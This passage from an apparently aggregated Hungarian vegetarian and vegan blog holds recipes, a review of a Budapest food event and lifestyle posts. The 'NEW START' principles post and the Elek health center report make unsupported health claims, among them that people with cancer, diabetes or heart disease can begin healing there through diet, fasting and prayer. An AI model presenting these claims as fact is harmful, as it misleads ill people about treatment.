pirospaprika sütőpapír Elkészítés: A tököt meghámozzuk és lereszeljük. Akinek nincs gyaluja, nyugodtan reszelheti olyan reszelőn, mint a sajtreszelő. Először hozzáadjuk a sót, a kaporleveleket és a fokhagymákat. (Érdemes nagyon apróra vágni a fokhagymákat, vagy fokhagymanyomón átpréselni.) Ezt követően a zabpehellyel átkeverjük, aztán amennyi zsemlemorzsa szükséges hozzátesszük. Ez attól függ, a zabpehely mennyire szívja fel a nedvességet. A lényeg, hogy könnyen gombócokat tudjunk formálni a masszából. Mielőtt a tepsibe készítenénk őket, pirospaprikával, köménnyel és borssal vagy borsikafűvel ízlésünknek megfelelően tovább ízesítjük. Amikor gyúrható, formázható állapotba kerül és az íze is megfelel számunkra, először kis gömböket :) majd a golyókat szétlapítva korongokat formálunk. Sütőpapíros tepsibe fektetjük őket és megsütjük. Miután kiszedtük őket a sütőből, és már ki is hűltek, érdemes letakarva tárolni a fasírtkorongokat, így jobban megőrzik frissességüket és puhaságukat. Szerintem egész gyorsan kész. Az alapanyagok elkészítése kb. 30 perc. Mondhatni, tovább sül, mint az elkészítése. Gazdag salátát ettünk hozzá, de főzelékhez is kiváló feltét. Tehetjük zsömlébe paradicsommal és paprikával és máris kész a vegán tízórai a gyereknek, vagy reggeli a dolgozó családtagoknak. További nagy előnye, hogy olcsó. Fagyasztott reszelt tököt is használhatunk hozzá.
Sajttorta
2012. szeptember 23. Vegavarázs
Magyarországon is nagyon elterjedt az utóbbi időben a sajttorta, ez itt egy tojásmentes változata. Ünnepekre kiváló édesség. Hozzávalók: A tésztához: 25 dkg liszt egy csipet só 1/2 kk sütőpor 10 dkg vaj 2 ek tejföl 8 dkg cukor A töltelékhez: 50 dkg ricotta vagy túró egy csipet só 50 dkg natúr... tovább>>
Fasírt fűszeres burgonyával
Vasárnap délelőtt kedvem nem volt, de időm sem maradt boltba menni. Mondjuk Pestnek ez az előnye, hogy szinte bármikor eszembe jut, mehetek. Otthon próbálnám meg mindezt, reggel mikor dolgozni megyek még nincs, hazaérve már nincs nyitva a bolt. Épp ezért az otthoni készletek szerintem egy hónapra elegendőek. Csepelen ellenben elég szűkös, főleg azután, hogy múlt héten a molyok miatt (az elvileg nagyon jól záródó dobozaim ellenére) a szekrény tartalma erősen megfogyatkozott. Nem baj, készültem. Vaníliás pipadohányt! :) szereztem be hétfőn, már csak kis zacskókat kellene varrnom, és mindenfelé szétpakolni. Tehát abból készült az ebédünk megint csak, amit otthon találtam. Krumpli volt, azt a jénaiba bepakoltam, egy kis fűszerezéssel megbolondítottam. Lehet natúr hagymát is kevés olaj és víz keverékén megsütni, pirospaprikával megszórni, és azt a sült burgonyához keverni, de most nem akartam. Inkább vöröshagyma fűszerkeverékkel szórtam meg. (Vöröshagyma por, és pirospaprika lehet az összetevője.) Nagyon finom lett. Ízlés szerint megbolondítható akár egy két fokhagymával is, amit a héjában rakunk a burgonya közé, és finomra sül, de magyaros fűszerkeverékkel is megszórhatjuk. Fűszeres burgonya Hozzávalók: 8 nagyobb burgonya 1/2 ek kókuszzsír 1 tk vöröshagyma fűszerkeverék 1 tk köménymag 1 tk só A burgonyákat meghámozzuk, vastag hasábokra vágjuk, kikent jénaiba tesszük. Megszórjuk a sóval, a fűszerekkel, és bő egy óra alatt a sütőben közepes hőfokon lefedve sütjük. Zabpelyhes fasírt Hozzávalók: 25 dkg apró szemű zabpehely 2 marék aprított napraforgómag 1 marék őrölt szezámmag 1 kis fej vöröshagyma apróra vágva 1 ek őrölt lenmag 1 ek sörélesztő pehely 1 ek burgonyapehely 1 ek zsemlemorzsa 1 tk só 1 nagy csipet pirospaprika 1 nagy csipet borsikafű kókuszzsír a tepsi kikenéséhez Minden összetevőt egy tálba szórunk, majd annyi vízzel felengedjük, hogy sűrű masszát kapjunk. 10-15 percig állni hagyjuk, majd kiolajozott tepsibe kanalazunk belőle egy-egy halmot, és ellapítjuk. Közepes hőfokon 15-15 percet sült mindkét oldalát. Hajlamos leragadni, ezért javasolt többször fordítani.
Gyöngyszem falatkák
2012. szeptember 13. Zizi kalandjai
Új sorozat indul itt a Zizi kalandjain a Hétvégi ízmorzsák mellett... Az internetnek köszönhetően hétről hétre rengeteg benyomás, inspiráció, információ ér néha olyan mennyiségben, hogy alig győzöm feldolgozni. A mai nap is ilyen. Épp az előbb osztottam meg Twitteren a ma ért inspiráció tömeg hét kedvencét, de úgy gondoltam, hogy ezt blog formába öntöm és megosztom veletek is hétről hétre. Szóval készítsetek egy csésze meleg teát, habos kakaót vagy cappuccinot, tálaljátok egy csábító süteménnyel vagy törjetek le egy darabkát egy finom étcsoki táblából, dőljetek hátra és ez legyen a ti időtök, amikor kikapcsoltok egy fél órára. Jó szórakozást! - Egy új blog, ahonnan máris néhány receptet kinéztem: Whole Promise - Épp múlt pénteken készítettem parmezános padlizsánt a Veg Every Day szakácskönyvből, erre ma a toszkán barátnőm Giulia kirakott egy nagyon hasonló receptet (a nagymama változatot) - ezt is ki fogom próbálni - Whole Living magazin egyik számának online változata tele hihetetlenül finom és tápláló ételek receptjeivel - Mandulás kuglóf, feltétlen meg kell sütnöm - Csodás lifestyle magazin, a Rue szeptemberi száma - Tuti nyerő a közelgő sütőtök szezonban: sütőtök pekándió fánkok - Ezt sem fogom kihagyni: kókusztejes barnarizs puding fahéjas ringlóval Kicsi Vútól - Rákattantam a washi tape-ekre (ez talán a dekortapasz magyarul?), ki is néztem innen néhányat
Nyers vegán cukormentes banán fagylalt
2012. augusztus 30. Zizi kalandjai
Ismertem már ezt a fagylalt készítési módszert, de mégsem csináltam soha. Múlt héten a barátnőm, Emiko átküldte nekem ezt a linket, hogy amikor megtalálta, rám gondolt (tudja, hogy szeretem a vegán, cukormentes desszerteket). Annyira egyszerű, hogy le sem írom külön a receptet. Csak érett banán kell hozzá, aztán mélyhűtő, majd egy erős konyhai robotgép. Én 3 darab banánt használtam, ez 2-3 főre elegendő fagylaltot fog eredményezni. A banánt hámozzuk meg és vágjunk kb. 1-2 centiméter vastag szeleteket belőle. Tegyük egy tányérra úgy, hogy minden szelet külön-külön legyen (ne legyenek egymáson), majd tegyük be a mélyhűtőbe 2-3 órára. A megfagyott banánszeleteket tegyük a robotgépbe és kapcsoljuk be. Először hangos lesz, meg mozogni fog a robotgép (valahogy kezelni kell a fagyott darabkákat), de néhány perc múlva fagyottá áll össze az egész. Ha még 3-4 percig dolgoztatjuk a robotgépet az egész krémes lesz. Ez a cukormentes vegán nyers banán fagylalt titka, amely kisbabák első fagylaltja is lehet. Természetesen adhatunk hozzá vaníliát, keverhetünk bele pirított mandulát vagy csokoládé darabkákat. Az eredmény: mennyei! A fent említett cikkben le van írva a tudományos magyarázata annak, hogy a banán hogyan képes ilyen könnyen fagylaltá válni (a magas pektin tartalmára gyanakodnak). A lényeg, aki még nem próbálta, ne hagyja ki! :)
Magyar Ízek Utcája - 2012. augusztus 20.
Hétfőn - mint már sokan tudjátok - a budai felső rakparton megrendezésre került harmadik alkalommal egyfajta "gasztrostreet". Nos, mi ugye eleve vegetáriánus (sőt gyakran vegán) életmódot folytató látogatóként nézelődtünk. Röviden, képekkel társítva elmondom benyomásaimat. Az alagút felől érkezve, szinte az első számottevő hely az "Ország tortája és az Ország kenyere" volt. (Képet sok máshol találhatsz, de ezt inkább nem reklámozom.) Ami a tortát illeti. Erősen szkeptikus voltam afelől, hogy igaz rá a hír, hogy semmi mesterséges anyag, stb. nincs benne, és ami a diabetikust illeti, képtelen voltam elhinni, hogy valóban természetes alapanyagú édesítővel készült, cukor hozzáadása nélkül. Szóval közelről is megnéztük a korona alakú sátorban osztott tortákat, de szkepticizmusom nem hagyott alább. Végül nem vettünk. Ennek több oka volt. Az egyik például az, hogy 500 forintért kínálták vékony szeletét. Csak belegondoltam, hogy egy 4 tagú család minden tagja venne egy szeletet, máris 2000 forinttal kevesebb marad a pénztárcájában. Én - bevallom - kicsit szégyelltem az árat. Az ország tortájának elérhető áron kellene lennie, főként egy ilyen eseményen. 500 forintos tortaszeletet a Duna-korzó híres cukrászdáiban kellemes körülmények között leülve fogyaszthatok el - és kérés nélkül még vizet is adnak hozzá. Itt pedig csak por volt, és kereshetted (volna), hol tudod élvezettel elfogyasztani. (Legfeljebb otthon.) És eleve a bizalmatlanság bennem csak nőttön nőtt. Ezt a tortát már egy-két napja süthetik, készíthetik, mire odaviszik a sok ezer ember számára. A 35 fok feletti hőség, még ha hűtős kocsival is készítik, és az egyéb körülmények tovább növelik, növelték bennem a kételyt afelől, hogy ez tuti egészséges és adalékmentes, tartósítószer mentes hozzávalókból készült. De nem ragozom tovább enyhe felháborodásom. Hiszen valaki épp az ellenkezőjét gondolja, és alig várta, hogy élvezettel kóstolgassa a Biznisz tortáját. (Már bocs, de számomra inkább az, sem mint az Ország tortája!) Leszögezem, magáról az igazi tortáról - amit mondjuk én sütnék meg, vagy valamelyik ismerősöm, vagy későbbiekben egy cukrászdában megkóstolnám - tehát a konkrét tortáról - kóstolás hiányában nincs se pro, se kontra véleményem. Következő élményem sajnos egy újabb kiakadás volt. Biztos én nem járok a földön. Bajai halászlé 1.850 forint! Baján az egyik legismertebb, árban is magasabb fekvésű ételeket kínáló étteremben 1700, de az adagbeli különbség szerintem erősen kimutatható. Hát jártam már Baján, ettem sok halászlét (90%-ban Bajai halászlét). Szerintem a hallevek között tényleg a csúcs! Voltam már a bajai halászléfőző népünnepélyen is egy-két alkalommal. Nos igen, a majdnem 2000 forintos halászlé árát egy bajai is sokallná bizonyára. Talán hasonló technológiával készült, mint Baján szokott (gyufatésztával krumpli nélkül) ez a hallé, de az adag láthatóan nem egy laktató adag volt ilyen árért. Pedig ha a bajaiak halászlét főznek, akkor ritkán kerül második fogás az asztalra. Legfeljebb pogácsa. De a hallé az előétel, főétel és a desszert is. :) Persze ezt csak az érti és érzi, aki megtapasztalta fenséges, egyedi ízét a bajai halászlének, amiért állítom, rajonganak ország-világ szerte. Van egy olyan felfogás is, hogy bajai halászlét csak bajai halból lehet készíteni (igazán finomat). Nos, aki eszerint gondolkodik, biztos, hogy eszébe sem jutott gasztronómiai "kiállításon" bajai halászlét fogyasztani. (Mea Culpa, nekem kellett volna meginterjúvolnom a bajai halászlé standjánál dolgozókat a részletek felől. Lehet előítéletem kisebb lenne.) Régen, az Istenhegyi úton volt egy bajai halászlét (is) főző halászlécsárda. A tulajdonosa már nem az, aki régen. Eladta. Na igen, ott is adtak arra, hogy minőségi - Baja vagy környéki halból főzzék a halászlét. Kényes dolog ez a bajai halászlé címke. Mondhatnám, nem minden arany, ami fénylik, nem minden halászlé igazi bajai, amit annak titulálnak. Amit megkóstoltam, az a mákos rétes volt (számomra a belseje túl nedves volt, pedig csak egy szem meggyet találtam benne). Valamint a flódni. Na igen, a flódnin sokkal inkább látszott, hogy "házi készítésű". Bár nem tudom, milyen minőségű szilvalekvárt és diót tudnak ilyen mennyiségben felhasználni a süteményhez. Tény, hogy a flódni és a rétes is mindezek ellenére finom volt. Nem volt túl édes, ennek örültem. Amit szívesen kipróbáltam volna, az a dödölle volt, de szerencsére időben megláttam, hogy zsírral sütik, így innentől kezdve meghatározott volt a tény, hogy nem veszünk. Nem is rémlik, mennyibe került. Emellett láttam még ilyen olyan péktermékeket, gyümölcsleveket, lekvárokat, savanyúságokat, limonádét, na és persze húst, alkoholt. A lekvárok árait tekintve ismét örültem, hogy itthon házi lekvár fogy. Egyrészt én is főzök be. (Még csak az eperlekvárt tettem fel, de csak azért, mert el vagyok maradva a blogírással.) Másrészt rokonságtól szoktam kapni lekvárt. A limonádé kapcsán meg kell jegyeznem, hogy épp egy családi beszélgetést hallottam, ezt mondták: "-Jéé, van benne menta!" Meg kell hagynom, nem sok menta volt benne, de hogy egyeseknek ez meglepetésszerű élmény, az nekem volt meglepetés. Szóval summa summarum úgy érzem, a gasztro kirakodóvásár elsősorban a pénzről szólt (legalább is az árakból az jött le nekem, hogy majdnem mindenki most akar meggazdagodni - ez bizonyos esetekben rendjén van, de azt gondolnám, ha valami legalább egy napra megkapja az "ország valamije" jelzőt, akkor az egyaránt elérhető kellene lennie pont egy nemzeti ünnepen szegénynek és gazdagnak - persze biztos mások másként gondolják). Másodsorban pedig arról, hogy ismét egy alkalom, hogy sok egészségtelen dolgot együnk, ja és az egészségtelen ételek egy részét pedig állítsuk már be egészségesnek. Tisztelet a kivételnek. (Volt egyáltalán ilyen?) Lehetséges, hogy nem nyerte el tetszésedet mindaz, amit beszámolóként a vásárról írtam, de személy szerint pozitív lelkülettel mentem oda, és elszomorított az, amit persze természetesnek kellene vennem, hogy meg kellett tapasztaljam. Azért, ha úgy adódik, jövőre is kimegyek.
Cukkinis ricottás pirítós
2012. augusztus 20. Zizi kalandjai
Ezt a bejegyzést már augusztus 12-én előkészítettem, hogy majd a balatoni nyaralás alatt befejezem és kiteszem. Aztán mégse így történt. Ha hiszitek, ha nem, élvezet volt kivonulni a mátrixból... könyvet olvastam (sokat!), barátokkal találkoztunk, teraszon reggeliztünk és gyertyafényes vacsoráztunk. Friss levegőn enni, falatozni, jó bort kortyolgatni, csendben lenni, egymásra nézni, mosolyogni, hallgatni a madarakat csiripelni... ez az igazi nyugalom, a teljes kikapcsolódás, amikor tényleg az ízeket érezzük és élvezzük. Nem mentünk étterembe, inkább minden este főztem valami egyszerűt, valami finomat. Az esetek többségében az éttermekben még mindig a rántott sajt, rántott gomba, sajtos tejfölös tészta a vegetáriánus választék. Szeretem ezeket az ételeket is, de elég ritkán kívánom meg. A strandon viszont nem hagytuk ki a lángost, a kakajós (igen j-vel) palacsintát, a vegetáriánus hamburgert és a főtt kukoricát, Badacsonyban pedig a jó bort a hegy legtetején, ahonnan fantasztikus a kilátás a magyar tengerre! Ez a pirítós meg csak jött. A kis parcellánkon termett a cukkini és a paradicsom is és valami egyszerűt akartam összedobni. Vettem hozzá ricottát... éreztem, hogy a piros-fehér-zöld jó választás lesz. Friss bazsalikommal és petrezselyemmel fűszereztem. Igazi nyári esti vacsora egy pohár finom fehérbor mellé! Cukkinis ricottás pirítós Hozzávalók 2 főre: - 1 közepes cukkini, kockákra vágva - 20 db koktélparadicsom, félbe vágva - 250 g ricotta - 1 kis fej lilahagyma, felkockázva - 2 teáskanál dijoni mustár - fél csokor petrezselyem, felaprítva - 10 levél bazsalikom, felaprítva - néhány szelet kenyér - só, bors - olívaolaj Egy tepsit béleljünk ki sütőpapírral. Egy tálban keverjük össze a cukkinit a paradicsommal, sózzuk, borsozzuk és locsoljuk meg két evőkanál olívaolajjal. Öntsük ezt a tepsire és 180 fokon süssük aranybarnára (kb. 10-15 perc). Közben egy tálban keverjük össze a ricottát a lilahagymával, a dijoni mustárral és egy kevés sóval és borssal. A kenyérszeleteket pirítsuk meg, kenjük meg a ricottás keverékkel és kanalazzunk rá a sült paradicsomból és cukkiniből. Szórjuk meg petrezselyemmel és bazsalikommal. Jó étvágyat!
NEW START életmód alapelvei II.
Napfény Élő szervezet nem tudna működni napfény nélkül. Fotoszintézis alapja is. Ha egy növényt kihúzunk a földből és fordítva tesszük be, a növény megfordul és a fény felé kezd nőni. A levelek felülete nem véletlen nagy - a napenergiát így hasznosítják legjobban. Élő szervezet számára a napfény elsősorban D vitamint állít elő a szervezetünkben termelődő koleszterinből. Ehhez nem szükséges további koleszterin bevitel, hiszen a szervezet megtermeli azt. A napfény depressziós egyének esetében ezáltal is gyógyhatással bír. Olykor napfény kúrával gyógyítják a depressziós betegeket. Árnyékos helyen élő emberek lehangoltabbak, fáradékonyabbak. Napos helyen élők, sok napon és levegőn töltött időt megélő embereknél egészen más hozzáállást eredményez. Immunerősítő hatása is van a napfénynek. Továbbá fertőtlenítő, baktériumölő hatással is bír. Napos utcarészeken kevesebb volt a megbetegedés a régi korokban is. Szoba napoztatása igen fontos. A baktériumok így el tudnak pusztulni. A sok bőrbetegség abból is adódhat, hogy nincs az ember eleget a napon, hogy kifejtse a hatását. Magyar ember életének 80%-t fedett helyen tölti. Egészséges életmód keretein belül törekedjünk a napon történő tartózkodásra. Hormonális és egészségvédő funkciók indulnak be napozás alatt. De a túlzott napozás - leégés - káros folyamat a bőrben. Aki lebarnul, leég, egy idő után lehámlik. A szervezetnek ez is egy védekező funkciója. Napi 15 perc napozás elegendő a minimális D vitamin termeléséhez. Mértékletesség, önuralom Mit jelent a mértékletesség szó valójában? Ha tudom, hogy valami káros, azt teljes mértékben el kell hagyni. Az ember az egyedüli lény, aki nem él a saját értelmi képességeivel. Az állatvilágban az állat ösztönösen elkerüli azt, ami rossz számára. Az ember szabad döntéssel rendelkezik, és sokszor ezt nem jól használja fel. Ha tudjuk valamiről, hogy káros, akkor is használjuk sajnos. Pl. tudjuk, hogy az állati zsíradék káros az emberi szervezetre. Ehhez képest az emberek nagy része, inkább mértékletesebben, de fogyasztja az állati termékeket. Ez nem mértékletesség. Ha valamiről megismerem, hogy rossz, elhagyom, és helyette olyat keresek, amit tudom, hogy jó. Zsír esetében hidegen sajtolt növényi olajjal helyettesítsünk. Tiszta levegő Környezetünk tele van szennyezett levegővel. Nem tudunk kifutni az életünkből. Az oxigén jó hatásával kevés ember él. 16-18 alkalommal veszünk levegőt egy perc alatt. Tüdőnk térfogata 3.5-4 liter. Vagyis ennek töredékét vesszük be és fújjuk ki. Több rejlik a tüdőben, mint amennyit használunk. Szakemberek javaslata is a mély légzés és a helyes testtartás. Fiatalok 40%-a alkalmatlan a fizikai munkára - helytelen életmód, táplálkozás miatt eltorzul a csontozatuk. Iskolában való állandó ülés következtében a vállövek előrehaladnak. A tüdő kisebb kapacitású lesz a helytelen testtartás miatt. Oxigénhiány lép fel sokszor a fiataloknál ezek következményeként. Segítség: Gyakorlatok végzésével a vállövet kiegyenesíteni. (Kajak-kenu sportolóknak nagy a tüdőkapacitása - intenzív fizikai munkavégzés során a tüdő kitágul.) Oxigénhiány a szervezetben fáradékonyságot, koncentrációzavart és kedélyállapot romlást okoz. Lehangoltság lesz úrrá rajtunk oxigénhiány következtében. Tanteremben, irodában fontos a rendszeres szellőztetés, valamint figyelni a helyes testtartásra. Szív és agy szövete sínyli meg a problémát elsőnek, ha ezeket a szabályokat nem tartjuk be. Hegymászók esetében az egyre magasabb légtér során folyamatosan ritkul a levegő - furcsa kedélyváltozás, sőt fizikai és szellemi leépülés következhet be, ezért oxigénmaszk szükséges. Ingerlékenyek, kibírhatatlanok lesznek az oxigénhiány miatt. Egészséges életmód tehát nem csak a testünk számára fontos. Szellemi és értelmi képességeinket is befolyásolja. A kettő nem elválasztható egymástól. Ami a fizikumra rossz hatással van, az az agyra is. Az agy működésében bekövetkezett változás az egész személyiségünkre hatással van. Értelmi képességre, lelki állapotra, jellemre hatással van. Erős kapcsolat van tehát a testi és lelki állapot között. Legjobb, ha az orron keresztül vesszük a levegőt. Orrüregben a nyálkahártya megméri a levegő paraméterét, és oxigénforrásként hasznosítja azt. A levegő felmelegszik a test hőmérsékletére. Megméri a levegő nedvességtartalmát - legoptimálisabbra átalakítja. Portalanítja. Fertőtlenítő hatása is van a nyálkahártyának. Intenzív söprögető munkát végez. Budapesten egy légvétel alatt egy felnőtt ember mintegy 5 milliárd porszemcsét szív be. Ezt tisztítja meg az orr. Gyermek szintjén pedig sokkal többszöröse a beszívott porszemcse mennyisége lélegzetvétel esetén. Reggelente tisztább a levegő. Baktériumok is ritkább számban találhatók meg. Déli órákban már a fertőzöttség mértéke is erősebb. Kisgyermekkel séta és a szellőztetés, ezért nem mindegy, mikor történik. Porcsökkentő a locsolás. Levegő állapota javítható szellőztetéssel, ezért gyakran szellőztessük tartózkodási helyünket. Egy ember fél liter levegőt szív be. Percenként 16-18 alkalommal lélegezzük be a levegőt. Felmérhető az arány, milyen gyakran kell szellőztetnünk. Jobb légzés frissebb agyfunkciót eredményez, mert az agy telítődik oxigénnel. Pihenés Regenerációs folyamat. 7-8 órát javasolnak felnőtteknél alvásra. Éjfél előtti alvás duplán számít. Hajnali 3 órától az ébresztési fázis megindul. Kisebb mérvű a pihenés. Heti pihenés esetében kimutatták, hogy a 6 nap munka + 1 nap pihenés ritmusa alatt a szervezet felkészül a következő terminusra. Emberi szervezet testi és lelki oldalát tekintve is nagyon előnyös. Lelki nyugalom Ha az első hét elvet követjük, megéljük. A nyolcadikat nem kivitelezzük, akkor ez egy rossz párosítás. Hiszen a stressz majdnem felér az előző hét hiányának káros hatásaival. A nyolcadik alapelv így kiegészíti a többit. Lelki nyugalom - megfelelő szemléletmóddal gondolkodásmóddal nyugalmas, körülményekhez képest békés életet lehet elérni, amely az egész életre jó kiegészítéssel szolgál. Nyugalom és nyugalom között is van különbség. Van, amikor hamis nyugalom van jelen, aminek nincs igaz alapja. Lehet találni igaz alapokon álló békességet, nyugalmat és lehet olyat is, ami nem képes gyökerestül kezelni a problémát. Ezzel végére értem a júliusra tervezett bejegyzéseimnek. Augusztusban pedig már következnek a finomabbnál finomabb ételek receptjei és képei. Már van jó néhány a tarsolyomban! :)
Programajánló: Zöld Nyári Egyetem
Augusztus 1-től 5-ig ismét Zöld Nyári Egyetem a Fejér megyei Bodajkon. Öt nap, száz előadó, legalább nyolcvan féle program, Róna Péter, Ángyán József, Tamás Gáspár Miklós, Amelia Andersdotter, Bodoky Tamás, Vitézy Dávid, Kürti Gábor, Krétakör, TedX, Magyar Kétfarkú Kutya Párt, bolyhos forradalom, bringaszerelés, ökoszépségszalon, kalózok, erdő közepe, tábortűz, patak, közösség, teljes ellátás, jókedv. Már csak Te hiányzol! Regisztrálj most! www.greenacademy.hu
Eleki Egészségközpont 11. rész
Záró nap Egy bő héttel elcsúsztam az utolsó nap beszámolójával, ugyanis hazaérkezve szembesültem azzal, amire számítottam: a valóbb világ dolgaival. Bizony a nyugalomnak oly módon vége lett, hogy beköszöntöttek a dolgos, munkás hétköznapok. Ráadásul még temetésen való részvétel is várt rám a héten. Ez utóbbi persze nem lett volna kötelező, de az elhunyt közel állt szívemhez, még ha a nagyszülőm is lehetett volna. De nem erről a szomorú eseményről szeretnék most írni, hanem az utolsó eleki napról. Mint legutóbb beszámoltam, lázterápiát követően 24 órás böjtben volt részem, az utolsó nap pedig ismét zöld napom volt. Zöldturmixszal és spirulinával indítottam, majd saláta, ebédre pedig szintén zöldség, de most már párolva és ráadásul volt a zöldbab mellé répa is tálalva. :) Nagyon örültem a répának, mert az elmúlt 10 napban kevés párolt répát ehettem, pedig azt is nagyon szeretem, de hát a színe nem zöld. :) Legfeljebb leveleit fogyaszthattam el a zöld turmixban. :)) Reggeli: Ebéd(részlet): Az érdekessége a napnak kezelés tekintetében is megvolt számomra, ugyanis "kozmetikai" kezelést kaptam. Vagyis a bőrömnek jutott némi élvezet. Só, hidegen sajtolt olíva olaj (Ha jól tudom, eleve gyógynövényes olaj) és víz oldatával kezelőm bedörzsölte a testem nagy részét, majd lezuhanyoztattam a bőrömön maradt sómaradványokat. Milyen felüdülés volt ez a bőrömnek! Nem gondoltam volna, hogy jobban hidratál, mint bármi más testápoló. Pedig így van. Száraz bőrű olvasóimnak szeretettel ajánlom ezt a módszert! Mivel a kezelés után a bőr selymes lesz és puha, ezért azt ajánlom, hogy először fürödjünk, zuhanyozzunk le, megszabadulva a nap során ránk rakódott kosztól, majd tenyerünkre vigyünk fel a fent említett keverékből és dörzsöljük át vele a testünket a lehető legtöbb helyen. Végül zuhanyoztassuk le a sómaradványokat a testünkről. Tekintettel arra, hogy a só morzsálódik, mindenképpen kádban vagy zuhanyfülkében végezzük el a műveletet. Hálás lesz a bőrünk érte. :) Belegondoltam, milyen sokan drága pénzeket fizetnek ki hidratálásért, miközben a természet adta kincseit alkalmazva sokkal egészségesebb bőrvédelemre és ápolásra van lehetőségünk. Kezelés mellett még szeretnék pár szót írni a szobatársamról is. Mi együtt utaztunk le Elekre és csináltuk végig ezt a turnust. Ő úgy érkezett, hogy elvétve még fogyasztott húst és tejterméket, valamint kevésbé törekedett arra, hogy étkezést követő egy órán belül se folyadékot, se gyümölcsöt, se semmilyen élelmiszert ne fogyasszon. Továbbá a két étkezés közötti 5-6 órás "gyomorpihenőt" is nehezen tudta saját életében megvalósítani. Jó volt látni, hogy a turnus közepére már szinte életszokássá váltak ezek a helyes életmódbeli lépések. Persze tisztában vagyok vele, hogy neki is küzdelmes napjai vannak hazaérkezését követően, mindenesetre kívánom neki az erőt a kitartó folytatáshoz. Emellett meg kell említenem azt a tényt, hogy éjszakára kétféle kezelést is kapott. Az egyik a kezére - ricinusolajjal kellett bekennie a kezét, kesztyűt (pamut) húzni rá és így elaludnia. Egy hétig biztos kitartóan végezte ezt a gyógymódot, és a turnus végére rendbe jött a "göcsörtös" (bocs!, jobb szót nem találtam rá) keze, ujjai. A másik kezelésben én is részt vehettem. Nap, mint nap feszült volt az egyik lapockáján az izomzat. Ha jól emlékszem erre olykor-olykor gőzpakolást is kapott, de néhány este során mentás olívaolajjal kentem be a hátán a fájósabb részt. Nem masszíroztam, csak átkentem gyengéd mozdulatokkal. Masszírozást a nap folyamán kapott esetenként, amikor kezelési idő volt. Turnus végére az izmai sokkal jobb állapotba kerültek, már nem fájtak. Ismét csak a csodálkozás szavait tudom kifejezni, egyszerű - orvosság nélküli gyógymódok a legtöbb esetben tényleg képesek helyrehozni az elromlott állapotot. Azonban úgy gondolom, feltétlen meg kell jegyeznem hozzá, hogy minden egyes gyógyulás története mögött ott áll az a tény, hogy a turnus ideje alatt megregulázták az étkezési szokásainkat. Napi 2, legfeljebb 3 étkezés, maximálisan növényi alapú ételeket fogyasztva, ez is szükséges volt a sikerélményeinkhez. Arról nem beszélve, hogy az étkezések utáni gyaloglás a legtöbb esetben (még a legnagyobb forróságban is) felfrissítette a testet. Természetesen ezek a gyógyulások, fejlődések az én és a többiek esetében nem következhetett volna be, ha a jó Isten nem adja áldását mindennapjainkra, és nem hívjuk segítségül Őt minden beteg helyzetben. Dicsőség és hála Néki a sok jó tapasztalatért, és köszönet Neki és a kezelőknek minden áldozatért, fáradozásért. Én úgy láttam, némelyik kezelő képes volt teljesen megfeledkezve önmagáról másért élni, más gyógyulásáért szolgálni. Bensőmben még mindig csodálattal ejt ámulatba kitartásuk és önfeláldozásuk. Elvégre is nekik reggel 5 órakor ébredni kellett ahhoz, hogy minden a program és a helyes rend szerint történjen a nap folyamán. S bizony megesett, hogy este 9-10 órakor még találkoztam az Egészségházban egy-két kezelővel. Szóval minden elismerésem az övéké, a szervezőké és tiszteletem jár annak a néhány embernek is, akik kb. 2 évvel ezelőtt útkészítőként minden nehézséget felvállalva elkezdték a gyógyítás ezen szolgálatát itt Eleken. Természetesen az utolsó nap záróakkordjaként mi vendégek megköszöntük nekik és a további dolgozóknak (szakácsok, takarítók, tanítók, stb.) a fáradozásukat, felejthetetlen munkájukat. Végső szóként értékelve maximálisan jól döntöttem, amikor felhívtam a szervezőt és jelentkeztem a turnusra. Tapasztalatban, tudásban gazdagodtam, a testem, lelkem felüdült, annak ellenére, hogy férjemmel hosszú napokon keresztül csak telefonon keresztül tudtunk beszélgetni, és nem láthattuk egymást. Azt kívánom, bárcsak minél több embernek lenne lehetősége, tudna időt szakítani erre a hasznos lehetőségre! Biztos vagyok benne, ha valaki önszántából úgy dönt, egy minőségibb életet akar élni, ez a hely partnere lesz az első lépések megtételében. Mindenkinek bátran ajánlom. Legyen az ember rákos, cukorbeteg, reumás, szívbeteg, túlsúlyos, mozgásbeteg, pszichikailag beteg vagy sérült, kimerült, vagy küzdjön csak azzal, hogy minden télen megfázások sorozatától szenved, vagy allergiás, szénanáthás, hormonbeteg, egyszóval bármilyen betegségben szenvedő, itt, Eleken elindulhat a gyógyulás útján. Segítő kezet kap az egészséges életmód szokássá történő elsajátításához, akkor is, ha nincs az életében komolyabb betegsége, csak nyitott és kíváncsi a new start életvitelre. Nem állítom, hogy luxusintézmény, hiszen nem négy-öt csillagos hotel a hely, de meg kell hagyni, hogy az egész város - Elek és környéke lenyűgözött a sok virágtól, a gyümölcsöktől roskadozó fák látványától. Öröm volt látni, hogy Magyarországnak ezen a pontján igazi mezőgazdasági termelést folytatnak. Fólia tele padlizsánnal, a másik fólia a paprikától sárgul. Élmény volt minden, igazán értékes élmény. Az ismeretek olyan tárházával gazdagodhat az ember egy turnus "elvégzése" által, ami maradandó és örök, ami segíti a minőségibb életvitel elsajátításához. És ami az egészben még a jó: mindez továbbadható! :) Megpróbáltam én is tovább adni minden kedves és kitartó Olvasónak egy-egy morzsát a napokból. Remélem, sokak számára bátorságot, fejlődést és reményt nyújt: van megoldás civilizációs betegségeinkre!
Több CLi, kevesebb recept
Kicsit fura lehet a cím, főleg annak, akinek a Cli betűkombináció nem mond semmit. Valójában egy diskmagról van szó, vagy ha magyarabbul akarjuk, lemezújságról. Száz éves találmány, sokféle volt, sorolhatnám a TN-t, a KM-et, de talán az egyik legtovább működő a CLi. Még kiadtuk a Function X-en Gargaj hathatós közreműködésével, de a 2011-esre már nem jött össze csak pár cikk, ami azóta is ott várja a wincesteremen a megjelenést... Szóval egy ebben a közegben jártas valaki közölte velem, hogy olvasgatta a blogot, de kevesebb recept kellene, és több CLi. :) Nos, nem az ő kedvéért, de mostanában tényleg kicsit több lesz a szöveg, és kevesebb a recept. Ennek hátterében igen összetett dolgok állnak. Részben az is, hogy sokkal kevesebbet főzök. Persze hasonló tendenciát mutat másoknál is, mikor negyven fok van, azonban nem csak ez a háttere. Bár tény, hogy az utóbbi időben a nyers dolgok esnek a legjobban, és dinnyét, barackot, paradicsomot eszek a legszívesebben. Azért csak voltak jelentős gasztro események a mi házunk táján is, pl. vasárnap befőztünk 30 kg barackot. Ugyan most nem göncit, hanem abaújvárit, de nagyon-nagyon finomak. Gyönyörű szép nagy, húsos, kicsit savanykás, a magja édes. Micunak külön köszönet a beszerzésért, és a szállításért! A hagymánk gyönyörű lett, 